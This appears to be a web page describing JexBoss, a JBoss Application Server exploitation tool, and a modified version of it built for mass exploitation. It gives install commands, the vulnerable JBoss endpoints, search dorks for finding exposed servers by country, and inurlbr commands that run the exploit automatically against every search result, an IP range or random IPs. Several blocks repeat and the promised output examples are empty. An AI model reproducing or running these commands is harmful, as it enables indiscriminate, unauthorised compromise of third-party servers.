JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.
Python <= 2.7.x
Installation
To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py
# [ + ] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
# [ + ] Updates: https://github.com/joaomatosf/jexboss
# [ + ] SCRIPT original: http://1337day.com/exploit/23507 - http://77.120.105.55/exploit/23507
# [ + ] Free for distribution and modification, but the authorship should be preserved.
Features
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
- /jmx-console - tested and working in JBoss versions 4, 5 and 6
- /web-console/Invoker- tested and working in JBoss versions 4
- /invoker/JMXInvokerServlet- tested and working in JBoss versions 4 and 5
The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner
All latches and test questions were withdrawn in order to be used in mass was added function to save vulnerable sites.
Mass Exploration:
Mass Exploration:
To do this we use the scanner inurlbr
Modified script for mass exploitation:
https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py
DORKS SEARCH
inurl:"jmx-console/HtmlAdaptor"
inurl:"/web-console/Invoker"
inurl:"/invoker/JMXInvokerServlet"
COMMAND INURLBR:
- single search.--dork {YOU_DORK}
php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"
DORKS SEARCH
inurl:"jmx-console/HtmlAdaptor"
inurl:"/web-console/Invoker"
inurl:"/invoker/JMXInvokerServlet"
COMMAND INURLBR:
- single search.--dork {YOU_DORK}
php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"
- search using dorks file
- File example with dorks:
site:br inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"
site:in inurl:"jmx-console/HtmlAdaptor"
site:ru inurl:"jmx-console/HtmlAdaptor"
site:pe inurl:"jmx-console/HtmlAdaptor"
site:br inurl:"/web-console/Invoker"
site:br inurl:"/web-console/Invoker"
site:uk inurl:"/web-console/Invoker"
site:ru inurl:"/web-console/Invoker"
site:us inurl:"/web-console/Invoker"
site:com inurl:"/web-console/Invoker"
So on .....
Exemple-> File: dorks.txt--dork-file {YOU_DORKFILE}
Exemple-> File: dorks.txt--dork-file {YOU_DORKFILE}
php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"
- Using to capture the range of ips--range {IP_START,IP_END}
php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"
- Range of ips random--range-rand {counter}
php inurlbr.php --range-rand '150' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"
Exemple OUTPUT:
- Using to capture the range of ips--range {IP_START,IP_END}
php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"
- Range of ips random--range-rand {counter}
php inurlbr.php --range-rand '150' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"
Exemple OUTPUT:
